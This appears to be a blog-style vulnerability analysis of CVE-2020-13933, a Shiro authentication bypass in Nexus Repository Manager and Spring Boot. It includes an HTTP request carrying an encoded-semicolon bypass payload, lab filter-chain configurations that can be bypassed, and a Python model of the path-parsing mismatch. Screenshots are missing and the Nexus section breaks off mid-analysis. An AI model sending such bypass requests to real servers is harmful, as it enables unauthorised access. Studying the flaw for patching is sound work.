References:
- https://support.sonatype.com/hc/en-us/articles/360053556313-CVE-2020-13933-Nexus-Repository-Manger-2-3-Shiro-Authentication-Bypass
- https://issues.sonatype.org/browse/NEXUS-25086
- https://help.aliyun.com/noticelist/articleid/1060730690.html
- https://github.com/lyy289065406/CVE-2020-13933
- https://github.com/sonatype/nexus-public/compare/release-3.26.1-02...release-3.27.0-03
Affected versions:
- Nexus Repository Manager 2 versions up to and including 2.14.18
- Nexus Repository Manager 3 versions up to and including 3.26.1
Look at the diff and search for the keyword shiro: it turns out Nexus bumped the Shiro version.

Try debugging:

First, send this request:

```http
GET /nexus/service/siesta/capabilities/%3b0002abde1d29011e HTTP/1.1
Host: 192.168.85.129:8081
Connection: close
```

The console prints this log line:

```
jvm 1 | 2020-11-13 02:56:00,809-0800 WARN [qtp609773298-49] anonymous org.sonatype.nexus.plugins.siesta.AuthorizationExceptionMapper - (ID 4a182908-df0e-4fe9-8de7-650a9467a9ad) Response: [401] ErrorXO{id='4a182908-df0e-4fe9-8de7-650a9467a9ad', message='User is not permitted: nexus:capabilities:read'} mapped from org.apache.shiro.authz.AuthorizationException/User is not permitted: nexus:capabilities:read
```

So, to find where this org.apache.shiro.authz.AuthorizationException is constructed (new'd), first locate the jar that contains it:

```shell
/d/repos/nexus-2.14.13-01-bundle/nexus-2.14.13-01
$ grep -rn "org.apache.shiro.authz.AuthorizationException" *
Binary file nexus/WEB-INF/lib/shiro-core-1.3.2.jar matches
```

Then set a breakpoint in IDEA:

Sure enough, when the request is sent again, execution stops here,

and then start analyzing the call stack:
Environment setup

References:
- https://www.anquanke.com/post/id/216096
- https://www.anquanke.com/post/id/218270

https://github.com/l3yx/springboot-shiro.git

Change the Shiro version in pom.xml to 1.5.3, then change the path mapping:
```java
    // original mapping with a fixed path (this form cannot be bypassed)
    // @GetMapping("/admin/page")
    // public String admin() {
    //     return "admin page";
    // }

    // mapping with a path variable, used for the test below
    @GetMapping("/admin/{name}")
    public String admin(@PathVariable String name) {
        return "admin page";
    }
```
Note that the path set in GetMapping here is /admin/{name}, not /admin/page (that configuration cannot be bypassed).

You need to know that ShiroConfig.java contains this configuration:

```java
map.put("/admin/*", "authc");
```

Note that it is /admin/*, not /admin/**.

Set a breakpoint on the return statement of the admin method. Reaching it means Shiro's restriction has already been bypassed.

Test again: set the configuration to

```java
map.put("/admin/index/*", "authc");
```

and the GetMapping to /admin/index/{name}. It can still be bypassed.

Attached are two different 404 pages (one from Spring, one from Tomcat).

But if it is set to

```java
map.put("/admin/index/**", "authc");
```

then /springboot-shiro-0.0.1-SNAPSHOT/admin/index/%3bpage cannot bypass it.
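To see why `/admin/*` lets `/admin/%3bpage` through while `/admin/**` does not, here is an added Python model (not code from this post or from the springboot-shiro project) of the two path views involved: the path Shiro 1.5.3 matches its filter chain against and the path Spring MVC routes on. The container, Shiro and Spring processing steps and the simplified Ant-style matcher are my assumptions about that behaviour, not those projects' code.

```python
from urllib.parse import unquote


def _strip_raw_params_then_decode(raw_uri):
    """Assumed container/Spring view: ';param' is removed from each *raw*
    segment before percent-decoding, so an encoded %3b survives as ';'."""
    return unquote('/'.join(seg.split(';', 1)[0] for seg in raw_uri.split('/')))


def spring_mvc_path(raw_uri):
    """Assumed model of Spring's UrlPathHelper: strip raw ';' content, decode."""
    return _strip_raw_params_then_decode(raw_uri)


def shiro_153_path(raw_uri):
    """Assumed model of Shiro 1.5.3: WebUtils.removeSemicolon cuts at the first
    decoded ';', then the chain resolver drops a trailing '/'."""
    path = _strip_raw_params_then_decode(raw_uri).split(';', 1)[0]
    if path != '/' and path.endswith('/'):
        path = path[:-1]
    return path


def ant_match(pattern, path):
    """Simplified Ant-style matcher: '*' and '{var}' match exactly one segment,
    '**' matches zero or more segments, anything else must match literally."""
    pat = [s for s in pattern.split('/') if s]
    segs = [s for s in path.split('/') if s]

    def rec(i, j):
        if i == len(pat):
            return j == len(segs)
        if pat[i] == '**':
            return any(rec(i + 1, k) for k in range(j, len(segs) + 1))
        if j == len(segs):
            return False
        p = pat[i]
        if p == '*' or (p.startswith('{') and p.endswith('}')) or p == segs[j]:
            return rec(i + 1, j + 1)
        return False

    return rec(0, 0)


def evaluate(raw_uri, shiro_pattern, controller_pattern):
    """Does the request reach the controller without hitting the authc filter?"""
    guarded = ant_match(shiro_pattern, shiro_153_path(raw_uri))
    routed = ant_match(controller_pattern, spring_mvc_path(raw_uri))
    return {'shiro_sees': shiro_153_path(raw_uri), 'authc_applied': guarded,
            'spring_sees': spring_mvc_path(raw_uri), 'controller_hit': routed,
            'bypass': routed and not guarded}


if __name__ == '__main__':  # the cases tried above, plus a plain request
    print(evaluate('/admin/%3bpage', '/admin/*', '/admin/{name}'))
    print(evaluate('/admin/%3bpage', '/admin/*', '/admin/page'))
    print(evaluate('/admin/index/%3bpage', '/admin/index/**', '/admin/index/{name}'))
    print(evaluate('/admin/page', '/admin/*', '/admin/{name}'))
```

In this model a pattern of the form `/prefix/*` never covers `/prefix` itself, which is exactly what Shiro is left with after trimming the semicolon and the trailing slash, whereas `/prefix/**` does; that is the defensive reason to prefer `/**` in `authc` mappings.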